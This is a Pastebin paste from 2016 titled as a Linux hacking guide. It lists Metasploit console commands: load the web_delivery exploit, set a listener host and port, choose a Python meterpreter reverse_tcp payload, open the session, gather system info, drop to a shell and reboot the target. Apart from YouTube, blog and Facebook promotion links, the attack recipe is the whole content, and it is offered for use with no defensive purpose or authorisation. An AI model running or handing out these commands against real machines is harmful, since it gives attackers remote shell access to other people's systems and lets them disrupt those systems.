Professional-hacker

How to hack linux with web delivery using Metasploit

Dec 26th, 2016
326
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.01 KB | None | 0 0
  1. ##################################################JokerSecurity######################################################### # Title : How to hack linux with web delivery using Metasploit
  2. # Tested On : [ Kali-Linux ]
  3. # MyChannel Youtube : https://www.youtube.com/channel/UCPRRAzu8dMWxChn-RruC-eg/videos
  4. # Myblog : http://kader-information.blogspot.com/
  5. # Link video : https://www.youtube.com/watch?v=qkpUIr5IXJY&feature=youtu.be
  6. ######################
  7. # [+] COMMENDS :
  8. ######################
  9. msfconsole
  10. use exploit/multi/script/web_delivery
  11. set LHOST 192.168.1.4
  12. set LPORT 4444
  13. set uripath /
  14. set target 0
  15. set payload python/meterpreter/reverse_tcp
  16. exploit
  17. sessions -i 1
  18. help
  19. sysinfo
  20. shell
  21. reboot
  22. subscribe for my channel and page in facebook
  23. # My Blogger : http://kader-information.blogspot.com/
  24. # Page FacebOOk : https://www.facebook.com/AnonymousPalestine.vip
  25. By <3 ##################################################JokerSecurity#########################################################
Add Comment
Please, Sign In to add comment